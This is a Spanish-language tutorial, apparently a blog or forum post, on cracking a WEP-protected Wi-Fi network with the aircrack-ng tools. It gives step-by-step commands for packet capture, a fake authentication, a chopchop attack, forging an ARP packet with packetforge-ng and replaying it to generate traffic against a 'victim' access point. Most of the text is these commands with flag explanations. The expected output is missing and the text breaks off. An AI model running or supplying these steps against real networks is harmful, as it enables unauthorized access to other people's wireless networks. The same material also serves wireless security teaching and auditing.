como siempre comenzaremos capturando los paquetes con el airodump, identificando el canal en el cual se encuentra la victima.
bash-3.1# airodump-ng ath0 --channel 11 -w captura
luego es necesario crear una autenticación falsa, como habiamos visto en el ejemplo anterior, esto lo hacemos:
aireplay-ng ath0 --fakeauth 20 -e KENOBII -a 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX
donde:
ath0 :interface
--fakeauth 20 :especifica el ataque y establece la peridicidad de este
-e KENOBII :ESSID, en este caso KENOBII
-a 00:11:50:XX:XX:XX :MAC de AP victima
-h 00:17:9A:XX:XX:XX :mi MAC
El comando anterior nos debe mostrar algo así

aireplay-ng ath0 --chopchop -b 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX
ath0 :interface
--chopchop :especifica el ataque
-b 00:11:50:XX:XX:XX :MAC de AP victima
-h 00:17:9A:XX:XX:XX :mi MAC
en este momento el programa comienza a leer paquetes



root@darkstar:~/chopchop# packetforge-ng --arp -a 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1224-150656.xor -w pakete.cap
donde:
--arp :especifica que creara un arp
-a 00:11:50:XX:XX:XX :especifica la mac de la victima
-h 00:17:9A:XX:XX:XX :mi MAC
-k 255.255.255.255 :ip de destino...(para el caso broadcast)
-l 255.255.255.255 :ip del remitente...=broadcast
-y XXX.xor :archivo PRGA..lo obtenemos del ataque chopchop
-w pakete.cap :archivo donde guardaremos nuestro arp
ahora es el momento de mandar nuestro arp, para generar el trafico, esto lo hacemos así:
root@darkstar:~/chopchop# aireplay-ng ath0 --interactive -r pakete.cap
donde:
ath0 : interface
--interactive : ataque
-r pakete.cap : lee desde el archivo pakete.cap
esto nos mostrará lo siguiente


chop